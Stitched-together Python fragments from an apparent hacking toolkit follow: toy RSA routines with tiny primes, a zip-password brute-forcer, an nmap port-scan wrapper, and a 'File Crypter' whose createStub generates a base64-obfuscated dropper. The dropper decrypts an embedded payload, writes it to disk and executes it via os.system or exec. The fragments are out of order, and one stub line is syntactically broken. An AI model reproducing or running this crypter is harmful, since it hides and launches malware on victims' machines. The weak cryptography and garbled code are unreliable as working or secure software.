def encrypt(self, private_key, plaintext): try: Logger.printMessage( message='{methodName}'.format(methodName='encrypt'), description='{private_key} - {msg}'.format( private_key=private_key, msg=plaintext[0:10]), debug_module=True) #Unpack the key into it's components key, n = private_key ba64 = base64.b64encode(plaintext) ashex = Utils.asciiToHex(ba64) hexba64 = Utils.hexToBase64(ashex) ba64un = Utils.joinBase64(hexba64) decasc = Utils.decimalToAscii(ba64un) mensaje = Utils.textToAscii(decasc) Logger.printMessage( message='{methodName}'.format(methodName='encrypt'), description='{msg} - Length: {l}'.format(msg=mensaje[0:10], l=len(mensaje)), debug_module=True) mensaje1 = [(ord(chr(char))**key) % n for char in mensaje] mensajeHex = Utils.asciiToHex(mensaje1) mensajeBase64 = Utils.hexToBase64(mensajeHex) mensajeFinalBase64 = Utils.joinBase64(mensajeBase64) return mensajeFinalBase64.decode("utf-8") except Exception as e: Logger.printMessage( message='{methodName}'.format(methodName='encrypt'), description='{msg}'.format(msg=e)) return
def crackZip(self, zipPathName, unzipper=None, alphabet='lalpha', password_length=4, password_pattern=None, log=False): #max_length_posibilities = int(config['max_for_chunk']) if not unzipper: unzipper = ht.getModule('ht_unzip') if log: Logger.setDebugCore(True) for text in [ Utils.getCombinationPosibilitiesByPattern( try_pattern=password_pattern) if password_pattern else Utils.getDict(length=password_length, alphabet=alphabet) ]: # if len(texts) > max_length_posibilities: # texts_list = numpy.array_split(texts, max_length_posibilities) # else: # texts_list = [texts] # for index_t_list, t_list in enumerate(texts_list): # if len(t_list) > max_length_posibilities: # Logger.printMessage(message='crackZip', description='Chunk {n} - {word}'.format(n=index_t_list, word=t_list[1])) # for text in t_list: if os.path.isfile(zipPathName): password = unzipper.extractFilePassword( zipPathName, text) #, posible_combinations=len(texts)) else: Logger.printMessage( message='crackZip', description='File doesnt exists {a}'.format(a=zipPathName), is_error=True) break if password: Logger.printMessage( message='crackZip', description='{msg_password_is} {a}'.format( msg_password_is=config['msg_password_is'], a=password), debug_module=True) if log: Logger.setDebugCore(False) return password Logger.setDebugCore(False) return None
def getRandomKeypair(self, length=8): Logger.printMessage( message='{methodName}'.format(methodName='getRandomKeypair'), debug_module=True) prime_a = '' prime_b = '' while prime_a == prime_b: while prime_a == '' or prime_a == prime_b: prime_a = Utils.getRandomPrimeByLength(length) while prime_b == '' or prime_a == prime_b: prime_b = Utils.getRandomPrimeByLength(length) if prime_a > prime_b: temp = prime_b prime_b = prime_a prime_a = temp Logger.printMessage(message='getRandomKeypair', description=(prime_a, prime_b), debug_module=True) return (prime_a, prime_b)
def getDevicePorts(self, ip, tcp=True, udp=False): Logger.printMessage( message='{methodName}'.format(methodName='getDevicePorts'), description='{param} - TCP {tcp} - UDP {udp}'.format(param=ip, tcp=tcp, udp=udp), debug_module=True) nm = nmap.PortScanner() results = nm.scan(ip) try: if tcp and not udp: return Utils.getValidDictNoEmptyKeys( results["scan"][ip]["tcp"]) if udp and not tcp: return Utils.getValidDictNoEmptyKeys( results["scan"][ip]["udp"]) if tcp and udp: return Utils.getValidDictNoEmptyKeys( [results["scan"][ip]["tcp"], results["scan"][ip]["udp"]]) return Utils.getValidDictNoEmptyKeys(results["scan"][ip]["tcp"]) except: return []
def generate_keypair(self, prime_a, prime_b): if not (Utils.isPrime(int(prime_a)) and Utils.isPrime(int(prime_b))): Logger.printMessage( message='{methodName}'.format(methodName='generate_keypair'), description=config['bad_identical_prime'], debug_module=True, is_error=True) return config['bad_identical_prime'] elif prime_a == prime_b: Logger.printMessage( message='{methodName}'.format(methodName='generate_keypair'), description=config['p_q_equal_error'], debug_module=True, is_error=True) return config['p_q_equal_error'] else: #n = pq n = prime_a * prime_b #Phi is the totient of n phi = (prime_a - 1) * (prime_b - 1) #Choose an integer e such that e and phi(n) are coprime e = random.randrange(1, phi) #Use Euclid's Algorithm to verify that e and phi(n) are comprime g = Utils.euclides(e, phi) while g != 1: e = random.randrange(1, phi) g = Utils.euclides(e, phi) #Use Extended Euclid's Algorithm to generate the private key d = Utils.multiplicativeInverse(e, phi) #Return public and private keypair #Public key is (e, n) and private key is (d, n) return ((e, n), (d, n))
def decrypt(self, public_key, ciphertext): Logger.printMessage( message='{methodName}'.format(methodName='decrypt'), description='{public_key}'.format(public_key=public_key), debug_module=True) #Unpack the key into its components key, n = public_key menRec = Utils.asciiToBase64(ciphertext.encode('utf-8')) menHex = Utils.base64ToHex(menRec) menDec = Utils.hexToDecimal(menHex) Logger.printMessage( message='{methodName}'.format(methodName='decrypt'), description='{msg}'.format(msg=menDec[0:10]), debug_module=True) menDesc = [((char**key) % n) for char in menDec] menAscii = Utils.decimalToAscii(menDesc) decasc = Utils.asciiToBase64(''.join(menAscii).encode()) hexba64 = Utils.base64ToHex(decasc) ashex = Utils.hexToDecimal(hexba64) deasc = Utils.decimalToAscii(ashex) ba64 = base64.b64decode(deasc.encode()) return ba64
from hackingtools.core import Logger, Utils, Config if Utils.amIdjango(__name__): from .library.core import hackingtools as ht else: import hackingtools as ht import os import binascii, base64 config = Config.getConfig(parentKey='modules', key='ht_rc4') output_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'output')) class StartModule(): def __init__(self): self._main_gui_func_ = '' self._funcArgFromFunc_ = { '_functionName_': { '_functionParamName_': { '_moduleName_': '_functionName_' } } } self.state = [None] * 256 self.p = None self.q = None def help(self): Logger.printMessage(message=ht.getFunctionsNamesFromModule('ht_rc4'), debug_module=True)
def createStub(self, crypto_data_hex, public_key, drop_file_name, save_name, is_iterating=False, is_last=False, convert=False): """ Create's the stub for the crypter and has some courious params he have to see Arguments --------- crypto_data_hex : str File path that want to crypt public_key : str New File name for crypted file when return's it drop_file_name : str New File name for crypted file when return's it save_name : str New File name for crypted file when return's it Keyword Arguments: is_iterating : bool Compile's the final file if we select it (default: {False}) is_last : bool Internal variable for looping on the crypting (default: {False}) convert : bool Internal varuable for looping on the crypting (default: {1}) Returns ------- str Crypted file path name / None """ stub = '' if is_last: stub = "import argparse, math, base64, binascii, random, sys, subprocess, os\nfrom random import randint\n" stub += "cdx = \"" + crypto_data_hex + "\"\n" stub += "drpnm = \"" + drop_file_name + "\"\n" stub += "pk = ({a}, {b})\n".format(a=public_key[0], b=public_key[1]) stub += """ def dcy(pk, cptx): k, n = pk mensajeRecibido = __reBa64__(cptx.encode('utf-8')) mensajeHexRecibido = __ba64Hex__(mensajeRecibido) mensajeDecimalRecibido = __hexDec__(mensajeHexRecibido) mensajeDescifrado = [((c ** k) % n) for c in mensajeDecimalRecibido] mensaje_de_ascii = __deAS__(mensajeDescifrado) decasc = __reBa64__(''.join(mensaje_de_ascii).encode()) hexba64 = __ba64Hex__(decasc) ashex = __hexDec__(hexba64) deasc = __deAS__(ashex) ba64 = base64.b64decode(deasc.encode()) return ba64 def __reBa64__(m): mBa64 = [m[i:i+4] for i in range(0, len(m), 4)] return mBa64 def __ba64Hex__(m): mHx = [base64.b64decode(b64) for b64 in m] return mHx def __hexDec__(m): mDec = [int(hexa.decode("UTF-8"), 16) for hexa in m] return mDec def __deAS__(m): m1 = ''.join([chr(d) for d in m]) return m1 def __meAS__(m): men = [ord(p) for p in m] return men dcy_data = dcy(pk=pk, cptx=cdx) """ if is_iterating: stub += "cdx = \"" + crypto_data_hex + "\"\n" stub += "pk = ({a}, {b})\n".format(a=public_key[0], b=public_key[1]) stub += "dcy_data = dcy(pk=pk, cptx=cdx)\n" stub += "exec(dcy_data)" else: stub += """ image_extensions = ('jpg', 'jpeg', 'bpm', 'ico', 'png') exec_extensions = ('bat', 'exe', 'vbs', 'ps1') python_extensions = ('py') nf = open(drpnm, 'wb') try: nf.write(dcy_data) except: pass nf.close() if os.path.exists(drpnm): if drpnm.split('.')[1] in image_extensions: imageViewerFromCommandLine = {'linux':'xdg-open', 'win32':'explorer', 'darwin':'open'}[sys.platform][imageViewerFromCommandLine, drpnm], close_fds=True) if drpnm.split('.')[1] in exec_extensions and sys.platform == 'win32': os.system(drpnm) if drpnm.split('.')[1] in python_extensions: exec(dcy_data) #proc = subprocess.Popen('python {fn}'.format(fn=drpnm), shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) """ stub_base64 = base64.b64encode(stub.encode('utf-8')) stub = "import base64\n" stub += "data = {st_ba64}\n".format(st_ba64=stub_base64) stub += "exec(base64.b64decode(data))" Utils.saveToFile(content=stub, fileName=save_name) if convert: self.convertToExe(save_name)
def __init__(self): Utils.emptyDirectory(output_dir) self._main_gui_func_ = 'crypt_file'
def crypt_file(self, filename, new_file_name, drop_file_name='', prime_length=4, compile_exe=False, is_iterating=False, iterate_count=1, is_last=False): """Crypt's a file when some params we have to use Arguments --------- filename : str File path that want to crypt new_file_name : str New File name for crypted file when return's it Keyword Arguments ----------------- drop_file_name : str Drop a new file on execute the cryted file (default: {''}) prime_length : int Set a prime length for auto-generating the primes for the cryptography (default: {4}) compile_exe : bool Compile's the final file if we select it (default: {False}) is_iterating : bool Internal variable for looping on the crypting (default: {False}) iterate_count : int Internal variable for looping on the crypting (default: {1}) is_last : bool Internal variable for looping on the crypting (default: {False}) Returns ------- str Crypted file path name / None """ Logger.printMessage( message='{methodName}'.format(methodName='crypt_file'), description='{filename}'.format(filename=filename), debug_module=True) temp_filename = filename if iterate_count > 1: temp_filename = filename for i in range(1, iterate_count): if i == iterate_count - 1: is_last = True temp_filename = self.crypt_file(filename=temp_filename, new_file_name=new_file_name, drop_file_name=drop_file_name, compile_exe=False, is_iterating=True, iterate_count=1, is_last=is_last) filename = temp_filename if filename and new_file_name: crypter_rsa = ht.getModule('ht_rsa') data = Utils.getFileContentInByteArray(filePath=filename) prime_a, prime_b = crypter_rsa.getRandomKeypair(prime_length) public, private = crypter_rsa.generate_keypair(prime_a, prime_b) crypted_data = crypter_rsa.encrypt(private_key=private, plaintext=data) new_file = new_file_name if not '.' in new_file: new_file = '{file}.py'.format(file=new_file) if compile_exe: self.createStub(crypto_data_hex=crypted_data, public_key=public, drop_file_name=drop_file_name, save_name=new_file, is_iterating=is_iterating, is_last=is_last, convert=True) new_file = '{file}.exe'.format(file=new_file.split('.')[0]) else: self.createStub(crypto_data_hex=crypted_data, public_key=public, drop_file_name=drop_file_name, save_name=new_file, is_iterating=is_iterating, is_last=is_last) return new_file else: return None
def __init__(self): Utils.emptyDirectory(output_dir) self._main_gui_func_ = 'extractFilePassword'
def __init__(self): Utils.emptyDirectory(output_dir) self._main_gui_func_ = 'crypt_file' self.__gui_label__ = 'File Crypter'
def __init__(self): Utils.emptyDirectory(output_dir) self._main_gui_func_ = 'crackZip' self.__gui_label__ = 'File Cracker by Bruteforce'